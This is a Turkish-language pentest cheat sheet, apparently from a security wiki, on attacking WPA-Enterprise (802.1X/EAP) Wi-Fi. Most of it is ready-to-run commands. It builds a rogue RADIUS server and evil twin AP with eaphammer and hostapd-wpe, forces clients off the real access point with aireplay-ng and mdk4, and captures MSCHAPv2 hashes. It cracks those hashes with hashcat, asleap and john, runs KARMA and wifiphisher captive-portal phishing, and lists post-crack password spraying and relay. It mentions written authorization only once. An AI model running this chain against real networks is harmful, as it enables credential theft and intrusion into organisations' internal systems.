WPA-Enterprise Saldırıları
802.1X difficulty: orta-zor
WPA-Enterprise (802.1X/EAP), ortak PSK yerine kullanıcı kimlikleriyle doğrulama yapar (genelde PEAP/EAP-TTLS + MSCHAPv2 veya EAP-TLS). En yaygın ofansif senaryo: sahte bir RADIUS/erişim noktası kurup, istemci sunucu sertifikasını doğrulamıyorsa MSCHAPv2 challenge/response yakalayıp offline kırmak veya netNTLM hash’i relay etmek.
EAP türleri (saldırı yüzeyi)
Section titled “EAP türleri (saldırı yüzeyi)”PEAP / EAP-TTLS + MSCHAPv2 → rogue RADIUS + hashcat -m 5500 (en sık)EAP-FAST → benzer; PAC/phase2 zayıf yapılandırmaEAP-TLS (istemci sertifikası) → sahte AP genelde kimlik alamaz; sertifika çalma ayrı yolEAP-PWD / EAP-GTC → nadir; GTC düz metin riskiKeşifte airodump AUTH sütunu MGT gösterir; ESSID kurumsal SSID’dir.
sudo airodump-ng --band abg wlan0monÖn koşullar
Section titled “Ön koşullar”- Monitor + AP mode (iki arayüz veya tek kart AP+deauth ayrımı)- eaphammer veya hostapd-wpe + freeradius-wpe- Hedef istemciler sertifika pin/validate etmiyor (BYOD, eski Windows, mobil)- Yasal kapsam: kurumsal SSID üzerinde yazılı izinRogue RADIUS ile kimlik yakalama
Section titled “Rogue RADIUS ile kimlik yakalama”-
Sahte sertifika ve AP kur — aynı SSID + 802.1X:
Terminal window eaphammer --cert-wizardTerminal window eaphammer -i wlan0 --channel 6 --auth wpa-eap \--essid "Kurumsal-WiFi" --credsTerminal window sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf -
İstemciyi çek — gerçek AP’ye deauth; zayıf doğrulamalı istemci sahte sunucuya bağlanır:
Terminal window sudo aireplay-ng --deauth 10 -a REAL_BSSID wlan1monTerminal window sudo mdk4 wlan1mon d -B REAL_BSSID -
MSCHAPv2 challenge yakala — eaphammer/hostapd-wpe log’unda:
username::challenge::response# veya asleap / john netntlm formatı -
Offline kır veya spray — yakalanan hash:
Terminal window hashcat -m 5500 netntlm.txt rockyou.txtTerminal window hashcat -m 5500 netntlm.txt rockyou.txt -r rules/best64.ruleTerminal window asleap -C challenge -R response -W wordlist.txtTerminal window john --format=netntlm netntlm.txt
hostapd-wpe log okuma
Section titled “hostapd-wpe log okuma”sudo hostapd-wpe hostapd-wpe.confgrep -i mschap /var/log/hostapd-wpe.logYakalanan kullanıcı adı çoğu zaman DOMAIN\user veya user@corp.local formundadır — iç ağda password spraying için doğrudan kullanılır.
EAP downgrade / iç içe evil twin
Section titled “EAP downgrade / iç içe evil twin”Bazı istemciler birden fazla SSID profili tutar. Aynı ESSID ile:
1) WPA2-Enterprise rogue (kimlik avı)2) Açık/captive portal twin (PSK/portal)3) Gerçek AP'ye sürekli deautheaphammer karma (KARMA) + enterprise kombinasyonları:
eaphammer -i wlan0 --essid "Kurumsal-WiFi" --auth wpa-eap --creds --karmaCaptive portal + Enterprise hibrit
Section titled “Captive portal + Enterprise hibrit”Kimlik alamadığınızda (EAP-TLS) veya tamamlayıcı olarak:
eaphammer -i wlan0 --essid "Kurumsal-WiFi" --captive-portalsudo wifiphisher -aI wlan0mon -e "Kurumsal-WiFi" -p oauth-loginHash kullanımı (post-crack)
Section titled “Hash kullanımı (post-crack)”Kırılan parola → domain password spray / VPN / OWA / Wi‑Fi yeniden bağlanmausername@corp → Kerberoast / AS-REP yoksa yine de lateral için değerliBaşarısız crack → netNTLM relay (ortama göre) veya wordlist zenginleştir (CeWL)cewl https://www.corp.com -m 6 -w corp.txthashcat -m 5500 netntlm.txt corp.txt -r rules/best64.ruleBaşarısızlık durumları
Section titled “Başarısızlık durumları”İstemci sertifikayı doğruluyor / pin'liyor → bağlanmaz; kimlik gelmezEAP-TLS only → rogue RADIUS yetmezPMF + yönetilen cihaz → deauth zayıf; beklenen reconnect azalırYanlış kanal / zayıf sinyal → istemci gerçek AP'de kalırBoş creds log → daha uzun deauth + doğru ESSID/şifrelemeAlternatif araçlar
Section titled “Alternatif araçlar”Saldırı zinciri
Section titled “Saldırı zinciri”airodump AUTH=MGT → ESSID kopyala → eaphammer --cert-wizard + --creds → deauth gerçek BSSID → MSCHAPv2 yakala → hashcat -m 5500 → domain spray / iç ağEAP-TLS ortam → evil twin captive (yardımcı ağ) veya cihaz/sertifika başka vektör (phishing, endpoint)